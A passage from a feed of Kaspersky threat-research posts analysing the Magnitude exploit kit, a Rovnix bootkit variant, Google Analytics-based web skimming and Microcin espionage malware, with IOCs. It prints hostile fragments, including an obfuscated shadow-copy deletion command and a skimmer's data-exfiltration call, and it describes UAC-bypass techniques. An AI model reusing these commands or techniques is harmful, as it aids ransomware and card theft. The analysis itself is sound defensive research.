Kaspersky

Subscribe to Kaspersky hírcsatorna Kaspersky
Frissítve: 2 perc 26 másodperc
2020. június 24.

Magnitude exploit kit – evolution

Exploit kits are not as widespread as they used to be. In the past, they relied on the use of already patched vulnerabilities. Newer and more secure web browsers with automatic updates simply do not allow known vulnerabilities to be exploited. It was very different back in the heyday of Adobe Flash because it’s just a plugin for a web browser, meaning that even if the user has an up-to-date browser, there’s a non-zero chance that Adobe Flash may still be vulnerable to 1-day exploits. Now that Adobe Flash is about to reach its end-of-life date at the end of this year, it is disabled by default in all web browser and has pretty much been replaced with open standards such as HTML5, WebGL, WebAssembly. The decline of exploit kits can be linked to the decline of Adobe Flash, but exploit kits have not disappeared completely. They have adapted and switched to target users of Internet Explorer without the latest security updates installed.

Microsoft Edge replaced Internet Explorer as a default web browser with the release of Windows 10 in 2015, but Internet Explorer is still installed for backward compatibility on machines running Windows 10 and it has remained a default web browser for Windows 7/8/8.1. The switch to Microsoft Edge development also meant that Internet Explorer would no longer be actively developed and would only receive vulnerability patches without general security improvements. Still, somehow, Internet Explorer remains a relatively popular web browser. According to NetMarketShare, as of April 2020 Internet Explorer is used on 5.45% of desktop computers (for comparison, Firefox accounts for 7.25%, Safari 3.94%, Edge 7.76%). Despite the security of Internet Explorer being five years behind that of its modern counterparts, it supports a number of legacy script engines. CVE-2018-8174 is a vulnerability in a legacy VBScript engine that was originally discovered in the wild as an exploited zero-day. The majority of exploit kits quickly adopted it as their primary exploit.

Since the discovery of CVE-2018-8174 a few more vulnerabilities for Internet Explorer have been discovered as in-the-wild zero-days: CVE-2018-8653, CVE-2019-1367, CVE-2019-1429, and CVE-2020-0674. All of them exploited another legacy component of Internet Explorer – a JScript engine. It felt like it was just a matter of time until exploit kits adopted these new exploits.

Exploit kits still play a role in today’s threat landscape and continue to evolve. For this blogpost I studied and analyzed the evolution of one of the most sophisticated exploit kits out there – Magnitude EK – for a whole year.

This blogpost in a nutshell:

  • Magnitude EK continues to deliver ransomware to Asia Pacific (APAC) countries via malvertising
  • Study of the exploit kit’s activity over a period of 12 months shows that Magnitude EK is actively maintained and undergoes continuous development
  • In February this year Magnitude EK switched to an exploit for the more recent vulnerability CVE-2019-1367 in Internet Explorer (originally discovered as an exploited zero-day in the wild)
  • Magnitude EK uses a previously unknown elevation of privilege exploit for CVE-2018-8641 developed by a prolific exploit writer
Introduction

Magnitude EK is one of the longest-standing exploit kits. It was on offer in underground forums from 2013 and later became a private exploit kit. As well as a change of actors, the exploit kit has switched its focus to deliver ransomware to users from specific Asia Pacific (APAC) countries via malvertising.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Active attacks by Magnitude EK in 2019 according to Kaspersky Security Network (KSN) (download)

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Active attacks by Magnitude EK in 2020 according to Kaspersky Security Network (KSN) (download)

Our statistic shows that this campaign continues to target APAC countries to this day and during the year in question Magnitude EK always used its own ransomware as a final payload.

Infection vector

Like the majority of exploit kits out there, in 2019 Magnitude EK used CVE-2018-8174. However, the attackers behind Magnitude EK were one of the first to adopt the much newer vulnerability CVE-2019-1367 and they have been using it as their primary exploit since February 11, 2020. As was the case with CVE-2018-8174, they didn’t develop their own exploit for CVE-2019-1367, instead reusing the original zero-day and modifying it with their own shellcode and obfuscation.

CVE-2019-1367 is a Use-After-Free vulnerability due to a garbage collector not tracking a value that was not rooted in the legacy JavaScript engine jscript.dll. By default, Internet Explorer 11 uses Jscript9.dll, but it’s still possible to execute the script using the legacy engine by enabling compatibility mode with Internet Explorer 7/8. This can be done with the following script attributes:

<meta http-equiv="x-ua-compatible" content="IE=EmulateIE8" /> <script language="JScript.Compact">…</script> <meta http-equiv="x-ua-compatible" content="IE=EmulateIE8" /> <script language="JScript.Encode">…</script>

The original exploit uses JScript.Compact, a special profile defined for embedded devices. But JScript.Encode is much more interesting because it was developed by Microsoft to protect scripts and prevent source code from being copied. This script attribute can execute scripts encoded with Microsoft Script Encoder (screnc.exe) and it also disables script debugging. Basically, it’s a DRM for JavaScript. Magnitude EK changed from its original exploit to take advantage of this feature.

Exploit packed with JScript.Encode technique

Unpacked exploit. Shellcode, names and some strings are obfuscated

Shellcode

Their shellcodes piqued my interest. They use a huge number of different shellcode encoders, from the classical Metasploit shikata_ga_nai encoder and DotNetToJScript to a variety of custom encoders and stagers.

It was also impossible not to notice the changes happening to their main shellcode responsible for launching the ransomware payload. The attackers are fine-tuning their arsenal on a regular basis.

Magnitude EK has existed since at least 2013, but below you can see just the changes to payload/shellcode that occurred over the period of one year (June 2019 to June 2020). During this period we observed attacks happening almost every day.

Timeline of shellcode/payload changes

Date Description June 2019 Shellcode downloads a payload that’s decrypted with a custom xor-based algorithm. All strings are assembled on stack and to change payload the URL shellcode needs to be recompiled. The payload is a PE module. The module export function name is hardcoded to “GrfeFVGRe”. The payload is executed in an Internet Explorer process. It contains an elevation of privilege exploit with support for x86 and x64 versions of Windows and an encrypted ransomware payload. After elevation of privilege it injects the ransomware payload to other processes, spawns the wuapp.exe process and injects there as well. If process creation fails, it also runs the ransomware from the current process. July 20, 2019 Payload module export function name is auto-generated. November 11, 2019 Shellcode tries to inject the payload to other processes. If API function Process32First fails, it spawns the process wuapp.exe from Windows directory and injects the payload there. The injection method is WriteProcessMemory + CreateRemoteThread.

The payload is ransomware without elevation of privilege. The payload module export function name is hardcoded again, but now to “lssrcdxhg”. November 20, 2019 Looks like they messed up the folder with shellcodes; in some attacks they use a shellcode from June, and later the same day they start to use their November shellcode with the new hardcoded export name “by5eftgdbfgsq323”. November 23, 2019 They start to use the elevation of privilege exploit again, but now they also check the integrity level of the process. If it’s a low integrity process, then they execute the payload with the exploit in the current process; if that’s not the case, then it’s injected into other processes. The process is no longer created from shellcode, but it’s still created from the payload. The payload module export name is hardcoded to “gv65eytervsawer2”. January 17, 2020 It looks like the attackers had a short holiday at the beginning of the year. The shellcode remains the same, but the payload module export function name is hardcoded to “i4eg65tgq3f4”. The payload changed a bit. The name of the created process is now assembled on stack. The name of the process also changed – it no longer spawns a wuapp.exe, but instead launches the calculator calc.exe and injects the ransomware payload there. January 27, 2020 The payload is no longer a PE module but plain shellcode. The payload consists of ransomware without elevation of privilege. February 4, 2020 The payload is a PE module again, but once again the export name is auto-generated. February 10, 2020 The shellcode comes with two URLs for different payloads. The shellcode checks the integrity level and depending on process integrity level, it executes the elevation of privilege payload or uses the ransomware payload straightaway. All strings and function imports in the exploit are now obfuscated. The payload does not spawn a new process, and only injects to others. February 11, 2020 Magnitude EK starts using CVE-2019-1367 as its primary exploit. The attackers use the shellcode from January 27, 2020, but they have modified it to check for the name of a particular process. If the process exists, they don’t execute the payload from Internet Explorer. The process name is “ASDSvc” (AhnLab, Inc.). February 17, 2020 The attackers switch to the shellcode from February 10, 2020, but the payload module export function name is hardcoded to “xs324qsawezzse”. February 28, 2020 Shellcode encryption is removed. The payload module export function name is hardcoded to “sawd6vf3y5”. March 1, 2020 Strings are no longer stored on stack. March 6, 2020 Back to the shellcode from February 17, 2020. March 10, 2020 The attackers add some functionality implemented after February 17, 2020: payload encryption is removed and strings are no longer stored on stack. The payload module export function name is still hardcoded to “xs324qsawezzse”. March 16, 2020 Functionality added so as not to inject into a particular process (explorer.exe). The injection method is also changed to NtCreateSection + NtMapViewOfSection + RtlCreateUserThread. April 2, 2020 The attackers add some functionality similar to that used in November 2019. They check the integrity level of a process and if it’s a low integrity process, they execute the payload from the current process. If that’s not the case, they inject it to other processes (other than explorer.exe) and at the end create a new process and inject it there as well. The created processes are C:\Program Files\Windows Media Player\wmlaunch.exe or C:\Program Files (x86)\Windows Media Player\wmlaunch.exe depending on whether it’s a WOW64 process or not. April 4, 2020 Shellcode updated to use a new injection technique: NtQueueApcThread. The shellcode also comes with a URL for a ransomware payload without elevation of privilege. The shellcode checks the integrity level and if it’s a low integrity process, the shellcode calls ExitProcess(). Use of the hardcoded export name “xs324qsawezzse” is also stopped. April 7, 2020 Back to the shellcode from April 2, 2020. May 5, 2020 Previously the attackers adjusted their injection method, but now they revert back to injection via the WriteProcessMemory + CreateRemoteThread technique. May 6, 2020 They continue to make changes to the code injection method. From now on they use NtCreateThreadEx.

 

Elevation of privilege exploit

The elevation of privilege exploit used by Magnitude EK is quite interesting. When I saw it for the first time, I wasn’t able to recognize this particular exploit. It exploited a vulnerability in the win32k kernel driver and closer analysis revealed that this particular vulnerability was fixed in December 2018. According to Microsoft, only two win32k-related elevation of privilege vulnerabilities were fixed that month – CVE-2018-8639 and CVE-2018-8641. Microsoft previously shared more information with us about CVE-2018-8639, so we can say with some certainty that the encountered exploit uses vulnerability CVE-2018-8641. The exploit has huge code similarities with another zero-day that we had found previously – CVE-2019-0859. Based on these similarities, we attribute this exploit to the prolific exploit writer known as “Volodya”, “Volodimir” or “BuggiCorp”. Volodya is famous for selling zero-day exploits to both APT groups and criminals. In the past, Volodya advertised his services at exploit(dot)in, the same underground forum where Magnitude EK was once advertised. We don’t currently know if the exploit for CVE-2018-8641 was initially used as a zero-day exploit or it was developed as a 1-day exploit through patch diffing. It’s also important to note that a public exploit for CVE-2018-8641 also exists, but it’s incorrectly designated to CVE-2018-8639 and it exploits the vulnerability in another fashion, meaning there are two completely different exploits for the same vulnerability.

Ransomware

Magnitude EK uses its own ransomware as its final payload. The ransomware comes with a temporary encryption key and list of domain names and the attackers change them frequently. Files are encrypted with the use of Microsoft CryptoAPI and the attackers use Microsoft Enhanced RSA and AES Cryptographic Provider (PROV_RSA_AES). The initialization vector (IV) is generated pseudo randomly for each file and a 0x100 byte long blob with encrypted IV is appended to the end of the file. The ransomware doesn’t encrypt the files located in common folders such as documents and settings, appdata, local settings, sample music, tor browser, etc. Before encryption, the extensions of files are checked against a hash table of allowed file extensions that contains 715 entries. A ransom note is left in each folder with encrypted files and at the end a notepad.exe process is created to display the ransom note. To hide the origin of the executed process, the ransomware uses one of two techniques: “wmic process call create” or “pcalua.exe –a … -c …”. After encryption the ransomware also attempts to delete backups of the files with the “wmic shadowcopy delete” command that is executed with a UAC-bypass.

Example of Magnitude EK ransom note

The core of the ransomware did not undergo many changes throughout the year. If we compare old samples with more recent versions, there are only a few notable changes:

  • In older versions, immediately at launch the payload gets the default UI language of the operating system using the GetSystemDefaultUILanguage API function and compares the returned value against a couple of hardcoded language IDs (e.g. zh-HK – Hong Kong S.A.R., zh-MO – Macao S.A.R., zh-CN – People’s Republic of China, zh-SG – Singapore, zh-TW – Taiwan, ko-KR – Korea, ms-BN – Brunei Darussalam, ms-MY – Malaysia). If the language ID doesn’t match, then ExitProcess() will be executed. In newer versions, the check for the language ID was removed.
  • In older versions, the ransomware deletes file backups with the command “cmd.exe /c “%SystemRoot%\system32\wbem\wmic shadowcopy delete” via UAC-bypass in eventvwr.exe. In the newer version, the command is obfuscated with caret character insertion “cmd.exe /c “%SystemRoot%\system32\wbem\wmic ^s^h^a^d^o^w^c^o^p^y^ ^d^e^l^e^t^e” and executed via UAC-bypass in CompMgmtLauncher.exe.
Conclusions

The total volume of attacks performed by exploit kits has decreased, but they still exist, are still active, and still pose a threat, and therefore need to be treated seriously. Magnitude is not the only active exploit kit and we see other exploit kits that are also switching to newer exploits for Internet Explorer. We recommend installing security updates, migrating to a newer operating system (make sure you stay up to date with Windows 10 builds) and also not using Internet Explorer as your web browser. Throughout the entire Magnitude EK campaign we have detected the use of Internet Explorer exploits with the verdict PDM:Exploit.Win32.Generic.

 

2020. június 23.

Oh, what a boot-iful mornin’

In mid-April, our threat monitoring systems detected malicious files being distributed under the name “on the new initiative of the World Bank in connection with the coronavirus pandemic” (in Russian) with the extension EXE or RAR. Inside the files was the well-known Rovnix bootkit. There is nothing new about cybercriminals exploiting the coronavirus topic; the novelty is that Rovnix has been updated with a UAC bypass tool and is being used to deliver a loader that is unusual for it. Without further ado, let’s proceed to an analysis of the malware according to the rules of dramatic structure.

Exposition: enter SFX archive

The file “on the new initiative of the World Bank in connection with the coronavirus pandemic.exe” is a self-extracting archive that dishes up easymule.exe and 1211.doc.

SFX script

The document does indeed contain information about a new initiative of the World Bank, and real individuals related to the organization are cited as the authors in the metadata.

Contents of 1211.doc

As for easymule.exe, its resources contain a bitmap image that is actually an executable file, which it unpacks and loads into memory.

Loading the “image”

Hook: enter UAC bypass

The code of the PE loaded into memory contains many sections remarkably similar to the known Rovnix bootkit and its modules, the source code of which leaked back in 2013.

Left: source of the malware; right: leaked Rovnix source code (bksetup.c)

However, the file under analysis reveals innovations clearly added by authors, based on the original Rovnix source code. One of them is a UAC bypass mechanism that uses the “mocking trusted directory” technique.

With the aid of the Windows API, the malware creates the directory C:\Windows \System32 (with the space after Windows). It then copies there a legitimate signed executable file from C:\Windows\System32 that has the right to automatically elevate privileges without displaying a UAC request (in this case, wusa.exe).

DLL hijacking is additionally used: a malicious library is placed in the fake directory under the name of one of the libraries imported by the legitimate file (in this case, wtsapi32.dll). As a result, when run from the fake directory, the legitimate file wusa.exe (or rather, the path to it) passes the authorization check due to the GetLongPathNameW API, which removes the space character from the path. At the same time, the legitimate file is run from the fake directory without a UAC request and loads a malicious library called wtsapi.dll.

Besides copying the legitimate system file to the fake directory and creating a malicious library there, the dropper creates another file named uninstall.pdg. After that, the malware creates and runs a series of BAT files that start wusa.exe from the fake directory and then clean up the traces by deleting the created directory and the easymule.exe dropper itself.

Development: enter Rovnix

The file uninstall.pdg clearly contains a packed executable file. It is designed to unpack the same malicious library that was previously downloaded using wusa.exe and DLL hijacking.

Uninstall.pdg

The code of the malicious library is kept minimal: the exported function WTSQueryUserToken obviously has no features required by the original wusa.exe, which imports it. Instead, the function reads uninstall.pdg, and unpacks and runs the executable from it.

Code of exported malicious library function

The unpacked uninstall.pdg turns out to be a DLL with the exported function BkInstall — another indicator that the malware is based on the leaked Rovnix code. Further analysis of the file confirms this.

Glued inside uninstall.pdg are executable files packed with aPLib. The gluing was done using the FJ utility (also from the Rovnix bootkit), as evidenced by the file-unpacking algorithm and the FJ signatures indicating the location of the joint in the file.

FJ utility signature

The glued files are the KLoader driver from the leaked Rovnix bootkit and a bootloader. Uninstall.pdg unpacks them, overwrites the VBR with the bootloader, and places the packed original VBR next to it. In addition, KLoader is written to the disk; its purpose is to inject the payload into running processes.

Left: source code of the malware; right: leaked Rovnix source code (kloader.c)

As seen in the screenshot, the source code of the malware is not much different from the original. The original code was seemingly compiled for use without a VFS and a protocol stack for the driver to operate with the network.

In this instance, the driver injects a DLL into the processes, which is that same un-Rovnix-like loader that we spoke about at the very beginning.

Thus, the general execution scheme looks as follows.

Execution scheme

Climax: enter loader

Let’s consider the new loader in more detail. The first thing to catch the eye is the PDB path in the file.

PDB path

When run, the malware first fills the structure with pointers to functions. The allocated memory is filled with pointers to functions, to be called subsequently by their offset in the allocated memory area.

Structure with functions

Next, the process obtains access to the Winsta0 and Default desktop objects for itself and all processes created by this process, and creates a thread with the C&C communication cycle.

Creating a C&C communication thread

Communication with C&C

Having created the thread, the malware checks its presence in the system using OpenMutexA. It then starts a C&C communication cycle, within which a data packet about the infected device is generated. This packet is XOR-encrypted with the single-byte key 0xF7, and sent to C&C.

Structure of sent data

In response, the malware receives an executable file that is loaded into memory. Control is transferred to the entry point of this PE file.

Displaying the PE file loaded into memory

Denouement: enter testing

The loader turns out not to be unique: several more instances were discovered during the analysis. They all have similar features, but with slight differences. For example, one of them checks that it is running properly by trying to register a NetService handler. If it fails (that is, the service is not running in the system), the malware stops working.

Example of a different version of the loader

Other instances of the loader do not use the bootkit, but do apply the same UAC bypass method. All indications are that the loader is currently being actively tested and equipped with various tools to bypass protection.

We also discovered instances that could serve as a payload for a loader. They contain similar PDB paths and the same C&Cs as the loaders. Interestingly, the addresses of the required APIs are got from the function name, which is obtained from the index in the configuration line.

Getting the API addresses

At the command of C&C, this malware can run an EXE file with the specified parameters, record sound from the microphone and send the audio file to the cybercriminals, turn off or restart the computer, and so on.

Processing a received command

The module name (E:\LtdProducts\Project\newproject\64bits\64AllSolutions\Release\PcConnect.pdb) suggests that the developers are positioning it as a backdoor, which could additionally have Trojan-Spy elements, judging by some configuration lines.

Configuration snippet; the lines in Chinese mean “Current user:”, “user password:”, “***Below are the system account and password [%04d-%02d-%02d %02d:%02d:%02d]***”

Epilogue

Our analysis of malware masquerading as a “new initiative of the World Bank” shows that even well-known threats like Rovnix can throw up a couple of surprises when their source code goes public. Freed from the need to develop their own protection-bypassing tools from scratch, cybercriminals can pay more attention to the capabilities of their own malware and add extra “goodies” to the source code, such as UAC bypass. Kaspersky products detect this threat and its related modules as Trojan.Win32.Cidox, Trojan.Win32.Generic, Trojan.Win32.Hesv, and Trojan.Win32.Inject.

IOC

7CFC801458D64EF92E210A41B97993B0
E2A88836459088A1D5293EF9CB4B31B7
bamo.ocry[.]com:8433
45.77.244[.]191:8090
45.77.244[.]191:9090
45.77.244[.]191:5050
45.76.145[.]22:8080
149.28.30[.]158:443

2020. június 22.

Web skimming with Google Analytics

Web skimming is a common class of attacks generally aimed at online shoppers. The principle is quite simple: malicious code is injected into the compromised site, which collects and sends user-entered data to a cybercriminal resource. If the attack is successful, the cybercriminals gain access to shoppers’ payment information.

To make the data flow to a third-party resource less visible, fraudsters often register domains resembling the names of popular web services, and in particular, Google Analytics (google-anatytics[.]com, google-analytcsapi[.]com, google-analytc[.]com, google-anaiytlcs[.]com, google-analytics[.]top, google-analytics[.]cm, google-analytics[.]to, google-analytics-js[.]com, googlc-analytics[.]com, etc.). But attack of this kind were also found to sometimes use the authentic service.

To harvest data about visitors using Google Analytics, the site owner must configure the tracking parameters in their account on analytics.google.com, get the tracking ID (trackingId, a string like this: UA-XXXX-Y), and insert it into the web pages together with the tracking code (a special snippet of code). Several tracking codes can rub shoulders on one site, sending data about visitors to different Analytics accounts.

Recently, we identified several cases where this service was misused: attackers injected malicious code into sites, which collected all the data entered by users, and then sent it via Analytics. As a result, the attackers could access the stolen data in their Google Analytics account. We found about two dozen infected sites worldwide. The victims included stores in Europe and North and South America selling digital equipment, cosmetics, food products, spare parts etc.

The screenshot below shows how the infection looks — malicious code with the attacker’s tracking code and tracking ID:

Screenshot 1

The attacker tries to hide their malicious activity using a classic anti-debugging technique. Screenshot 2 shows code for checking whether Developer mode is enabled in the visitor’s browser. The code in the screenshot above is executed only if the result is negative.

Screenshot 2

Curiously, the attackers left themselves a loophole — the option to monitor the script in Debug mode. If the browser’s local storage (localStorage) contains the value ‘debug_mode’==’11’, the malicious code will spring into life even with the developer tools open, and will go as far as to write comments to the console in clumsy English with errors. In screenshot 3, the line with the ‘debug_mode’ check follows the implementation of the RC4 encryption algorithm (used to encrypt the harvested data before sending it).

Screenshot 3

If the anti-debugging is passed, the script collects everything anyone inputs on the site (as well as information about the user who entered the data: IP address, UserAgent, time zone). The collected data is encrypted and sent using the Google Analytics Measurement Protocol. The collection and sending process is shown in screenshot 4.

Screenshot 4

The stolen data is sent by invoking the send event method in the ‘eventAction’ field.

The function signature in this case is:

ga('send', 'event', { 'eventCategory': 'Category', //Protocol Parameter: ec; Value type: text; Max Lenght: 150 Bytes 'eventAction': 'Action', //Protocol Parameter: ea; Value type: text; Max Lenght: 500 Bytes 'eventLabel': 'Label' //Protocol Parameter: el; Value type: text; Max Lenght: 500 Bytes });

This leads to an HTTP request being sent to the URL
https[:]//www.google-analytics.com/collect?<parameters>&ea=packed_stolen_data&<parameters>

In the above-described case, malicious code is inserted into a script on the infected site in “readable” form. In other cases, however, the injection can be obfuscated. Malicious code also can be downloaded from a third-party resource. Screenshot 5 shows an example obfuscation option. In this variant, a call to a malicious script from firebasestorage.googleapis[.]com is inserted into the infected site.

Screenshot 5

After deobfuscation, we obtain a similar script with the same distinctive comments. Part of its code is presented in screenshot 6 (a different tracking ID is used).

Screenshot 6

What’s the danger

Google Analytics is an extremely popular service (used on more than 29 million sites, according to BuiltWith) and is blindly trusted by users: administrators write *.google-analytics.com into the Content-Security-Policy header (used for listing resources from which third-party code can be downloaded), allowing the service to collect data. What’s more, the attack can be implemented without downloading code from external sources.

How to avoid the issues

Users:

  • Install security software. Kaspersky solutions detect malicious scripts used in such attacks as HEUR:Trojan-PSW.Script.Generic.

Webmasters:

  • Do not install web applications and CMS components from untrusted sources. Keep all software up to date. Follow news about vulnerabilities and take recommended actions to patch them.
  • Create strong passwords for all administration accounts.
  • Limit user rights to the minimum necessary. Keep track of the number of users who have access to service interfaces.
  • Filter user-entered data and query parameters to prevent third-party code injection.
  • For e-commerce sites, it is recommended to use PCI DSS-compliant payment gateways.
IOCs

firebasestorage.googleapis[.]com/v0/b/bragvintage-f929b.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/canature-5fab3.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/ericeirasurfskate-559bf.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/gluten-8e34e.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/laser-43e6f.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/movile-720cd.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/plumb-99e97.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/redfox-64c35.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/tictoc-9677e.appspot.com/o/*

 

2020. június 19.

Microcin is here

In February 2020, we observed a Trojan injected into the system process memory on a particular host. The target turned out to be a diplomatic entity. What initially attracted our attention was the enterprise-grade API-like (application programming interface) programming style. Such an approach is not that common in the malware world and is mostly used by top-notch actors.

Due to control server reuse (Choopa VPS service), target profiling techniques and code similarities, we attribute this campaign with high confidence to the SixLittleMonkeys (aka Microcin) threat actor. Having said that, we should note that they haven’t previously applied the aforementioned coding style and software architecture. During our analysis we didn’t observe any similar open source tools, and we consider this to be the actor’s own custom code.

To deliver a new network module with a coding style that we consider enterprise-grade, Microcin used steganography inside photos, including this one of a sock (payload removed here)

SixLittleMonkeys’ sphere of interest remains the same – espionage against diplomatic entities. The actor is still also using steganography to deliver configuration data and additional modules, this time from the legitimate public image hosting service cloudinary.com. The images include one related to the notorious GitLab hiring ban on Russian and Chinese citizens. In programming terms, the API-like architecture and asynchronous work with sockets is a step forward for the actor.

Why we consider the current software architecture interesting

By “enterprise-grade API-like programming style” we mean, firstly, asynchronous work with sockets. In terms of Windows user-space entities, it was I/O completion ports. In the OS kernel space, this mechanism is actually a queue for asynchronous procedure calls (APC). We believe there’s a reason for using it in backend applications on the high-loaded server-side. Obviously, however, neither client-side software nor Trojans of this kind need this server-side programming approach. So, it looks to us like the developers have applied some habits from server-side programming.

Secondly, the exported function parameters in the injected library look more like an API: the arguments are two callback functions – encryptor/decryptor and logger. So, if the authors decide to change encryption or logging algorithms, they could do so easily without even touching the network module. Once again, even targeted malicious samples rarely take such architectural issues into consideration.

Another injected library’s exported function parameter is the host name. If the caller doesn’t pass the infected host name as this parameter, the following commands will not be executed. It filters out all messages to other hosts.

Initial infection Module features File name Detection time Backdoor sideloaded by legit GoogleCrashHandler version.dll 2019.12.31 Downloader/decryptor inside spoolsv.exe address space spoolsv.dll 2020.01.16 Bitmap picture with steganography inside Random .bmp name 2020.01.16 Network module in the same spoolsv.exe address space Module.dll 2020.01.16

Infection timeline

The backdoor is started by GoogleCrashHandler.exe, due to .dll search order hijacking (version.dll). Bitmap files with a steganography downloader and decryptor (spoolsv.dll), injected into the spoolsv.exe API-like network module, are injected into the same system process.

Let’s cover the modules one at a time. Our telemetry shows that another Microcin backdoor was already on the host before this new network module. It’s most probably a reinfection with newer malware.

Backdoor MD5 File name Compilation timestamp Size c9b7acb2f7caf88d14c9a670ebb18c62 version.dll 2020.05.20 02:37:58 407552

This UPX packed .dll was executed with the legitimate GoogleCrashHandler.exe (very common library search order hijacking) just before the New Year. The compilation timestamp is obviously spoofed. In this case we don’t know how the backdoor, along with the legitimate application, was delivered.

We won’t concentrate on this backdoor in this report, because it’s fairly typical for Microcin. We just want to emphasize that the timeline above shows it existed on the host before the analyzed module.

Downloader/decryptor

The campaign in question starts with the 64-bit spoolsv.dll downloader/decryptor module that has to be loaded by spoolsv.exe into its address space.

Downloader/decryptor MD5 Modified time Size Build Target ID c7e11bec874a088a088b677aaa1175a1 2020.03.04 12:20:13 155291 20200304L02f @TNozi96 ef9c82c481203ada31867c43825baff4 2019.10.15 11:46:04 145233 20200120L03o @TNozi96 1169abdf350b138f8243498db8d3451e 2019.01.25 04:58:15 150195 20191119L 123456

So far, we have registered three samples of this module. The file tails contains the following encrypted configuration data.

Parameter Length (bytes) Possible values .bmp URL len 4 82 .bmp URL .bmp URL len http://res.cloudinary.com/ded1p1ozv/image/upload/v1579489581/<random_name>.bmp Sleep time 2 17211 and other non-round random numbers Module build length 4 15 Module build Module build length Date based on the previous table Target ID length 4 9 Target ID Target ID length Readable strings from the previous table Random ASCII chars 16 Randomly generated on host Hardcoded canary 4 0x5D3A48B6

We have published the source code of our decryptor for Microcin’s configuration and steganography at https://github.com/dlegezo/common.

The bitmap URL serves to download the image (like the one with the sock shown above) with the next stage network module. The module build, target ID and random ASCII chars are for the next network module, which includes them in the control server communications.

To get the bitmap, the downloader sends an HTTP GET request to cloudinary.com. The steganography is inside the color palette part of the .bmp file. A typical decryption algorithm includes four stages:

  1. Combine neighboring half bytes into one byte
  2. Decrypt data length with custom XOR-based algorithm
  3. Decrypt six-byte XOR key for main data
  4. Decrypt data itself using decrypted length and key

Besides the configuration data and steganography, the same algorithm is used for the C2 traffic. As we mentioned, due to the malware architecture, the latter can easily be changed. Encryption is XOR-based, but the key scheduling is quite specific and tricky. In the corresponding appendix we provide the part of the decryptor containing the algorithm.

Bitmap images and steganography

Besides the sock image, the campaign operators use more social-oriented photos (payload removed here). The background here is the GitLab hiring ban on Russian and Chinese citizens

So far, we have registered four different images. The encrypted content in all cases are PE files with the following network module and C2 domain for the files. This is the only parameter that comes from bitmap; all others are provided by the downloader.

Image content C2 domain Network module MD5 Sock in washing machine apps.uzdarakchi[.]com 445b78b750279c8059b5e966b628950e Two people in hoodies forum.mediaok[.]info 06fd6b47b1413e37b0c0baf55f885525 GitLab hiring ban forum.uzdarakchi[.]com 06fd6b47b1413e37b0c0baf55f885525 Woman with child, militaries owa.obokay[.]com 06fd6b47b1413e37b0c0baf55f885525 Network in-memory module

The downloader decrypts the configuration data and C2 domain from the bitmap and then everything is ready to start the last stage inside the same spoolsv.exe virtual address space. We consider the architectural approach in this module to be the most interesting part of the chain.

The network module’s entry point is the exported function SystemFunction000() with multiple arguments. As a beacon, the Trojan prepares an HTTP POST request with the target’s fingerprinting data. And a lot of the parameters become part of the request.

Exported function argument Parameter meaning Target host name This has to be the same as the infected machine host name. Only then will the Trojan start and receive commands. Initialized by the downloader Target ID We already enumerated these readable ASCII strings from the decrypted downloader’s config, e.g., @TNozi96 Build version Inside these readable ASCII strings the dates are clearly mentioned. The C2 uses them to understand which build it’s currently working with WORD field of fingerprint structure Initialized with 0x4004 by the downloader. We don’t have enough data to describe this field’s meaning C2 IP address and port number The coordinates of the C2, initialized from the decrypted bitmap image ASCII string in fingerprint structure Unique random string generated by the downloader BYTE to fingerprint structure Initialized with 0x4004 by the downloader. We don’t have enough data to describe this field’s meaning Half of maximum sleep time Sleep time before the working cycle. Half because the full time is counted <this arg> + <random>%<this arg>. It’s effectively a maximum of a maximum sleep time Logger address First callback function address. In this case it’s a logger function inside the downloader Encryptor/decryptor address Second callback function address. In this case it’s an encryptor/decryptor function inside the downloader

The last two arguments illustrate why we call the network module API-like: any encryption and logging routine could be used without even touching the module code. We consider this programming approach as scalable and useful for large systems. Let’s take a look at these two callback arguments.

Callback and its arguments Callback features Logger takes ASCII string as a log message Logger function whose parameter is the message text. In this module all the messages are shortenings like “LIOO”, “RDOE”, etc. Encryptor/decryptor to deal with the traffic between host and C2, takes its length, encryption key, and the flag (0 to encrypt and 1 to decrypt) as argument data Encryptor/decryptor function first used to encrypt beacon with target’s fingerprint. It then decrypts C2 command structures and encrypts replies to them

The module uses the Windows API function WSAIoctl() – something rarely seen in malware – to get the ConnectEx() address and sends a prepared request. Another Windows API function, GetQueuedCompletionStatus(), is in charge of asynchronous work with I/O. In other words, the malware uses I/O completion ports for Windows user-space entities, which is effectively an APC queue in the OS kernel.

The same data structure is used for both sides of the communication: from host to C2 and back. Let’s describe its main fields here.

Field Features Command code One byte in the structure is the command code, which could vary from 0x00 to 0x16 (22). We describe the main network module commands in the table below Error code Another byte is used for the error code Command argument The main command field that takes all the necessary strings, etc. and also keeps fingerprinting data in the case of the beacon

So far, we have described the infection chain, module architecture, custom encryption and HTTP POST-based C2 communication protocol. Last, but not least, is the command set shown in the table below.

Command code Command features 3 Check if target’s ID meets the parameter 4 List logical drives 5 List files 6 Create directory 7 Remove directory 8 Copy file 9 Move file 10 Delete file 11 Execute PE 12 Execute Windows shell command 14 Terminate program 15 File download 16 Read from downloaded file 17 File upload 18 Write to file 19 Stop 20 Sleep Infrastructure Domain IP First seen ASN apps.uzdarakchi[.]com 95.179.136[.]10 November 11, 2019 20473 forum.uzdarakchi[.]com 172.107.95[.]246 February 7, 2020 40676 forum.mediaok[.]info 23.152.0[.]225 March 19, 2020 8100 owa.obokay[.]com N/A (now parked) To sum up

